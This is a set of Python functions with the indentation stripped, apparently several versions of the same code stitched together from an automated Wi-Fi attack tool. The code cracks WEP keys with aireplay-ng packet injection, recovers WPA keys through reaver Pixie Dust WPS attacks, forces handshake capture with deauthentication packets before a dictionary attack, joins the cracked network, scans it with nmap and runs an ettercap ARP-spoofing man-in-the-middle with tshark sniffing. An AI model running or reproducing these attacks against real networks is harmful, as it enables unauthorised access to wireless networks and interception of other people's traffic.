def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(4)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
report.saveLog("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(
settings.INTERFACE, settings.TARGET_ESSID,
settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if 'Error' in line:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
'"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(
['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
settings.INTERFACE
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(4)
def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info("Running an association & packet injection attack")
cmd_auth = pexpect.spawn(
'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
settings.INTERFACE_MON))
cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
cmd_auth.expect(
['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
cmd_auth.close()
parse_log_auth = open(settings.LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful :-) injecting packets...")
parse_log_auth.close()
os.remove(settings.LOG_FILE)
proc_aireplay = subprocess.Popen([
'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
settings.TARGET_BSSID, '-h', settings.NEW_MAC,
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(settings.WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
if 'ASCII' in line:
wh2 = line.find('ASCII')
key_start = 'ASCII('
key_end = line.find(')')
settings.TARGET_KEY = line[wh2 + len(key_start):key_end]
else:
key_start = 'KEY FOUND!'
key_end = line.find(']')
settings.TARGET_KEY = line[wh +
len(key_start):key_end].strip(
) # 13 (?)
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Attack failed!")
def run(self):
info("Running NMap -O -sV scan...")
subprocess.call([
'nmap', '-oN', 'cr0z0n0_nmap', '--exclude', settings.IP_LAN,
settings.LAN_RANGE
],
stderr=subprocess.DEVNULL)
def run(self):
info("Running Pixie Dust attack...")
report.saveLog("Running Pixie Dust attack...")
cmd_reaver = pexpect.spawn(
'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(
settings.INTERFACE_MON, settings.TARGET_CHANNEL,
settings.TARGET_BSSID))
cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
cmd_reaver.expect(
['WPA PSK:', 'WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF],
30)
cmd_reaver.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
if 'WPA PSK:' in line:
key_reg = re.split("('.*?')|(\".*?\")", line)
key_filter = key_reg[1].replace("'", "")
settings.TARGET_KEY = key_filter
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Pixie Dust attack failed!")
report.saveLog("Pixie Dust attack failed!")
def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'PPDRON_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info(
"Trying to get the handshake (sending deauthentication packets...)"
)
report.saveLog(
"Trying to get the handshake (sending deauthentication packets...)"
)
cmd_aireplay = pexpect.spawn('aireplay-ng -0 10 -a {0} {1}'.format(
settings.TARGET_BSSID, settings.INTERFACE_MON))
time.sleep(10)
cmd_aireplay.close()
time.sleep(settings.WPA_EXPECT_HANDSHAKE_TIME)
cmd_pyrit = pexpect.spawn('pyrit -r PPDRON_attack-01.cap analyze')
cmd_pyrit.logfile = open(settings.LOG_FILE, 'wb')
cmd_pyrit.expect(['No valid', 'good', pexpect.TIMEOUT, pexpect.EOF])
cmd_pyrit.close()
handshake = True
parse_log_pyrit = open(settings.LOG_FILE, 'r')
for line in parse_log_pyrit:
if "No valid" in line:
warn("We couldn't get the handshake :-(")
report.saveLog("We couldn't get the handshake :-(")
handshake = False
parse_log_pyrit.close()
os.remove(settings.LOG_FILE)
if handshake != False:
info("We have something :-) Making a dictionary attack...")
report.saveLog(
"We have something :-) Making a dictionary attack...")
cmd_crack = pexpect.spawn(
'aircrack-ng -w dictionary_wpa2 PPDRON_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF])
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
key_end = line.find(']')
settings.TARGET_KEY = line[wh + 13:key_end]
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Dictionary attack failed!")
report.saveLog("Dictionary attack failed!")
def WEP_attack(essid, bssid, channel, new_mac, iface_mon):
#Delete old files:
if os.path.exists(OS_PATH + '/cr0z0n0_attack-01.csv'):
os.remove(OS_PATH + '/cr0z0n0_attack-01.csv')
os.remove(OS_PATH + '/cr0z0n0_attack-01.cap')
os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')
proc_airodump = Popen([
'airodump-ng', '--bssid', bssid, '-c', channel, '-w', 'cr0z0n0_attack',
iface_mon
],
stdout=DN,
stderr=DN)
cmd_auth = pexpect.spawn(
'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
essid, bssid, new_mac, iface_mon))
cmd_auth.logfile = open(LOG_FILE, 'wb')
cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF],
20)
cmd_auth.close()
parse_log_auth = open(LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful")
parse_log_auth.close()
os.remove(LOG_FILE)
proc_aireplay = Popen([
'aireplay-ng', '-3', '-e', '"' + essid + '"', '-b', bssid, '-h',
new_mac, iface_mon
],
stdout=DN,
stderr=DN)
time.sleep(WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
cmd_crack.logfile = open(LOG_FILE, 'wb')
cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF],
30)
cmd_crack.close()
key_found = False
parse_log_crack = open(LOG_FILE, 'r')
for line in parse_log_crack:
where = line.find('KEY FOUND!')
if where > -1:
if line.find('ASCII') != -1:
where2 = line.find('ASCII')
key_end = line.find(')')
key_found = line[where2 + 6:key_end]
else:
key_end = line.find(']')
key_found = line[where + 13:key_end]
parse_log_crack.close()
os.remove(LOG_FILE)
return key_found
def run():
settings.TARGET_MITM = get_target_mitm()
info("Executing MITM and Sniffing attacks between {g} and {m}...".format(g=settings.GATEWAY, m=settings.TARGET_MITM))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(g=settings.GATEWAY, m=settings.TARGET_MITM, i=settings.INTERFACE))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE))
proc = subprocess.call(["tshark", "-i", settings.INTERFACE], stderr=subprocess.DEVNULL)
def connect(essid, key, iface_mon=None):
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1)
iface = get_ifaces()[0]
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(essid, key if key is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface], stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
do_connect()
if get_current_essid(iface) != essid and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=essid))
do_connect()
if get_current_essid(iface) == essid:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(iface[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=essid, i=ipaddr))
return ipaddr
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=essid))
exit(1)
def run():
if os.path.exists(settings.OS_PATH + '/cr0z0n0_attack-01.csv'):
os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.csv')
os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.cap')
os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
os.remove(settings.OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'cr0z0n0_attack', settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
cmd_auth = pexpect.spawn(
'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
settings.INTERFACE_MON))
cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF],
20)
cmd_auth.close()
parse_log_auth = open(settings.LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful")
parse_log_auth.close()
os.remove(settings.LOG_FILE)
proc_aireplay = subprocess.Popen([
'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
settings.TARGET_BSSID, '-h', settings.NEW_MAC, settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(settings.WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF],
30)
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
where = line.find('KEY FOUND!')
if where > -1:
if line.find('ASCII') != -1:
where2 = line.find('ASCII')
key_end = line.find(')')
settings.TARGET_KEY = line[where2 + 6:key_end]
else:
key_end = line.find(']')
settings.TARGET_KEY = line[where + 13:key_end]
parse_log_crack.close()
os.remove(settings.LOG_FILE)
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(settings.TARGET_ESSID, settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn('iwconfig {0} essid "{1}" key s:{2}'.format(settings.INTERFACE, settings.TARGET_ESSID, settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open('/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write('ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.call(['wpa_supplicant', '-B', '-c', '/etc/wpa_supplicant/wpa_supplicant.conf', '-i', settings.INTERFACE], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(sock.fileno(), 0x8915, struct.pack('256s', bytes(settings.INTERFACE[:15], 'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(e=settings.TARGET_ESSID))
exit(1)
def run():
settings.TARGET_MITM = get_target_mitm()
info("Executing MITM and Sniffing attacks between {g} and {m}...".format(
g=settings.GATEWAY, m=settings.TARGET_MITM))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
g=settings.GATEWAY, m=settings.TARGET_MITM, i=settings.INTERFACE))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE))
proc = subprocess.call(["tshark", "-i", settings.INTERFACE],
stderr=subprocess.DEVNULL)
def scan_targets(iface_mon, essid=None):
"""
Scans the surrounding networks for a predefined amount of time.
Orders the found APs by power, and then returns the one with most IV captured (or the specified network in the essid parameter)
The AP is represented by a dict, in the form:
{'Privacy': 'WPA2 WPA', 'Authentication': 'PSK', 'channel': '1', 'ESSID': 'The Beardhouse', 'LAN IP': '0. 0. 0. 0', 'First time seen': '2015-12-15 04:10:22', 'Speed': '54', 'IV': '0', 'beacons': '25', 'ID-length': '14', 'Cipher': 'CCMP TKIP', 'Power': '-63', 'Last time seen': '2015-12-15 04:10:31', 'Key': '', 'BSSID': '38:60:77:A4:68:A1'}
Notice that the keys are mapped to airodump-ng column names, EXCEPT for 'beacons' and 'IV'
"""
import csv
info("Scanning {t} seconds for target WiFi access points...".format(
t=AIRODUMP_SCAN_TIME))
# Delete old files:
if os.path.exists(OS_PATH + '/cr0z0n0-01.csv'):
os.remove(OS_PATH + '/cr0z0n0-01.csv')
os.remove(OS_PATH + '/cr0z0n0-01.cap')
os.remove(OS_PATH + '/cr0z0n0-01.kismet.csv')
os.remove(OS_PATH + '/cr0z0n0-01.kismet.netxml')
cmd_airodump = pexpect.spawn(
'airodump-ng -w cr0z0n0 {0}'.format(iface_mon))
cmd_airodump.expect([pexpect.TIMEOUT, pexpect.EOF], AIRODUMP_SCAN_TIME)
cmd_airodump.close()
with open(OS_PATH + '/cr0z0n0-01.csv', 'r') as f:
f.readline() # skip empty line
header = list(f.readline().split(', '))
header = list(map(lambda x: x.replace('# ', '').strip(),
header)) # cleanup
d = csv.DictReader(f,
delimiter=',',
skipinitialspace=True,
fieldnames=header)
aps = []
for e in d:
if e.get('Power') is not None:
aps.append(e)
else:
# Nearing the end, there's the stations list,
# for which we don't care right now
break
if len(aps) == 0:
error("No WiFi networks in range! Nothing we can do.")
exit(1)
if essid is None:
for ap in aps:
if ap.get('ESSID').find('00') != -1:
aps.remove(ap)
aps = sorted(aps, key=lambda x: x.get('Power'))
# From the top 2, get the one with most IV
return sorted(aps[:2], key=lambda x: x.get('IV'), reverse=True)[0]
else:
for ap in aps:
if ap.get('ESSID') == essid:
return ap
def run(self):
info(
"Running a Sniffing and MITM attack between {g} and {m}...".format(
g=settings.GATEWAY, m=settings.TARGET_MITM))
cmd_ettercap = pexpect.spawn(
'ettercap -T -M arp:remote /{g}/ /{m}/ -i {i}'.format(
g=settings.GATEWAY,
m=settings.TARGET_MITM,
i=settings.INTERFACE))
time.sleep(2)
# cmd_tshark = pexpect.spawn('tshark -i {i} -w cr0z0n0_sniff'.format(i=settings.INTERFACE)) # backup (?)
proc = subprocess.call(["tshark", "-i", settings.INTERFACE],
stderr=subprocess.DEVNULL)
def scan_targets(iface_mon, essid=None):
"""
Scans the surrounding networks for a predefined amount of time.
Orders the found APs by power, and then returns the one with most IV captured (or the specified network in the essid parameter)
The AP is represented by a dict, in the form:
{'Privacy': 'WPA2 WPA', 'Authentication': 'PSK', 'channel': '1', 'ESSID': 'The Beardhouse', 'LAN IP': '0. 0. 0. 0', 'First time seen': '2015-12-15 04:10:22', 'Speed': '54', 'IV': '0', 'beacons': '25', 'ID-length': '14', 'Cipher': 'CCMP TKIP', 'Power': '-63', 'Last time seen': '2015-12-15 04:10:31', 'Key': '', 'BSSID': '38:60:77:A4:68:A1'}
Notice that the keys are mapped to airodump-ng column names, EXCEPT for 'beacons' and 'IV'
:param iface_mon: Monitoring interface with which to scan
:param essid: If supplied, it gets the airodump information for this particular ESSID
"""
import csv
info("Scanning {t} seconds for target WiFi access points...".format(t=AIRODUMP_SCAN_TIME))
# Delete old files:
if os.path.exists(OS_PATH + '/cr0z0n0-01.csv'):
os.remove(OS_PATH + '/cr0z0n0-01.csv')
os.remove(OS_PATH + '/cr0z0n0-01.cap')
os.remove(OS_PATH + '/cr0z0n0-01.kismet.csv')
os.remove(OS_PATH + '/cr0z0n0-01.kismet.netxml')
cmd_airodump = pexpect.spawn('airodump-ng -w cr0z0n0 {0}'.format(iface_mon))
cmd_airodump.expect([pexpect.TIMEOUT, pexpect.EOF], AIRODUMP_SCAN_TIME)
cmd_airodump.close()
with open(OS_PATH + '/cr0z0n0-01.csv', 'r') as f:
f.readline() # skip empty line
header = list(f.readline().split(', '))
header = list(map(lambda x: x.replace('# ', '').strip(), header)) # cleanup
d = csv.DictReader(f, delimiter=',', skipinitialspace=True, fieldnames=header)
aps = []
for e in d:
if e.get('Power') is not None:
aps.append(e)
else:
# Nearing the end, there's the stations list,
# for which we don't care right now
break
if len(aps) == 0:
error("No WiFi networks in range! Nothing we can do.")
exit(1)
if essid is None:
for ap in aps:
if ap.get('ESSID').find('00') != -1:
aps.remove(ap)
aps = sorted(aps, key=lambda x: x.get('Power'))
# From the top 2, get the one with most IV
return sorted(aps[:2], key=lambda x: x.get('IV'), reverse=True)[0]
else:
for ap in aps:
if ap.get('ESSID') == essid:
return ap
def pixiedust():
info("Trying PixieDust attack")
cmd_reaver = pexpect.spawn(
'reaver -i {0} -c {1} -b {2} -s n -K 1 -vv'.format(
settings.INTERFACE_MON, settings.TARGET_CHANNEL,
settings.TARGET_BSSID))
cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
cmd_reaver.expect(['WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF], 30)
cmd_reaver.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
if line.find('WPA PSK: ') != -1:
settings.TARGET_KEY = line[line.find("WPA PSK: '") + 10:-1]
parse_log_crack.close()
os.remove(settings.LOG_FILE)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
essid, key if key is not None else ''))
if iface_mon is not None:
call(['airmon-ng', 'stop', iface_mon], stdout=DN, stderr=DN)
time.sleep(1) # TODO: Necessary? - yep for Raspbian.
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(iface, essid, key))
cmd_connect.logfile = open(LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(LOG_FILE, 'r')
for line in parse_log_connect:
if line.find('Error') != -1:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + essid + '"\n')
wpa_supplicant.write(
'key_mgmt=WPA-PSK\n'
) # TODO: Always wpa-psk? - No problem yet.
wpa_supplicant.write('psk="' + key.strip() + '"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
call(['dhclient', iface, '-r'], stdout=DN, stderr=DN)
call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
call(['iwconfig', iface, 'mode', 'managed'])
call(['killall', 'wpa_supplicant'], stdout=DN, stderr=DN)
call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i', iface
],
stdout=DN,
stderr=DN)
time.sleep(2)
parse_log_connect.close()
os.remove(LOG_FILE)
tries += 1
call(['dhclient', iface], stdout=DN, stderr=DN)
time.sleep(4)
def wep_attack(essid, bssid, channel, new_mac, iface_mon):
if os.path.exists(OS_PATH + '/cr0z0n0_attack-01.csv'):
os.remove(OS_PATH + '/cr0z0n0_attack-01.csv')
os.remove(OS_PATH + '/cr0z0n0_attack-01.cap')
os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.csv')
os.remove(OS_PATH + '/cr0z0n0_attack-01.kismet.netxml')
proc_airodump = subprocess.Popen(['airodump-ng', '--bssid', bssid, '-c', channel, '-w', 'cr0z0n0_attack', iface_mon],
stdout=DN, stderr=DN)
cmd_auth = pexpect.spawn('aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(essid, bssid, new_mac, iface_mon))
cmd_auth.logfile = open(LOG_FILE, 'wb')
cmd_auth.expect(['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
cmd_auth.close()
parse_log_auth = open(LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful")
parse_log_auth.close()
os.remove(LOG_FILE)
proc_aireplay = Popen(['aireplay-ng', '-3', '-e', '"' + essid + '"', '-b', bssid, '-h', new_mac, iface_mon],
stdout=DN, stderr=DN)
time.sleep(WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng cr0z0n0_attack-01.cap')
cmd_crack.logfile = open(LOG_FILE, 'wb')
cmd_crack.expect(['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
cmd_crack.close()
key_found = False
parse_log_crack = open(LOG_FILE, 'r')
for line in parse_log_crack:
where = line.find('KEY FOUND!')
if where > -1:
if line.find('ASCII') != -1:
where2 = line.find('ASCII')
key_end = line.find(')')
key_found = line[where2 + 6:key_end]
else:
key_end = line.find(']')
key_found = line[where + 13:key_end]
parse_log_crack.close()
